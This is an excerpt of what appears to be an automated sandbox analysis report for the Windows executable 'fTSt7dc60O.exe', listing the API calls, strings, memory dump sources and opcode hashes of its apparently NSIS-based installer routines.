                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                      • String ID:
                                                      • API String ID: 3294113728-0
                                                      APIs
                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                      • GetTickCount.KERNEL32 ref: 00402D53
                                                      • wsprintfW.USER32 ref: 00402D81
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                        • Part of subcall function 00402CFE: MulDiv.KERNEL32(0002C6C2,00000064,0003161B), ref: 00402D13
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 722711167-2449383134
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                      • GetMessagePos.USER32 ref: 00404ADF
                                                      • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401D44
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                      • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID: Times New Roman
                                                      • API String ID: 3808545654-927190056
                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                      • wsprintfW.USER32 ref: 00402CD1
                                                      • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                      • API String ID: 1451636040-1158693248
                                                      APIs
                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                      • GlobalFree.KERNEL32(?), ref: 10002572
                                                      • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc
                                                      • String ID:
                                                      • API String ID: 1780285237-0
                                                      APIs
                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                      • wsprintfW.USER32 ref: 00404A70
                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$&B
                                                      • API String ID: 3540041739-2907463167
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                      • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValuelstrlen
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp
                                                      • API String ID: 1356686001-2707921621
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FreeGlobal
                                                      • String ID:
                                                      • API String ID: 2979337801-0
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                      • String ID:
                                                      • API String ID: 1148316912-0
                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                      • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                      • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                      • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                      • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                      • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                      • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00405999
                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 004059A3
                                                      • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                      Strings
                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405993
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrcatlstrlen
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 2659869361-2382934351
                                                      • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                      • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                                      • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                      • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                      • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                      • String ID:
                                                      • API String ID: 1404258612-0
                                                      • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                      • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                      • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                      • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                      APIs
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                        • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                        • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 3585118688-0
                                                      • Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                      • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                      • Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                      • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00405195
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                        • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                      • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                      • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                      • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                      • CloseHandle.KERNEL32(?), ref: 004056F5
                                                      Strings
                                                      • Error launching installer, xrefs: 004056D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                      • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                      • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                      • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,00403861,771B3420,0040366C,?), ref: 004038A4
                                                      • GlobalFree.KERNEL32(?), ref: 004038AB
                                                      Strings
                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040389C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Free$GlobalLibrary
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 1100898210-2382934351
                                                      • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                      • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                      • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                      • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                      APIs
                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fTSt7dc60O.exe,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 004059E5
